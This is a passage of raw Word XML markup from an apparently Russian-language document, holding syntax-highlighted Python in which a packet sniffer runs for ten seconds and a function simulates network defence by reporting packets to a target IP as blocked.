        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>sniff</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>prn</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Сниффинг</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>течение</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>секунд</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D5075" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E248AB1" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Симуляция</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>защиты</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>фильтрация</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>пакетов</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE9A19C" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>simulate_defense</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9BA6F" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">[IP].dst == </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A20938" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">"Защита: Пакет от </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[IP].src</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> заблокирован"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47487B77" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
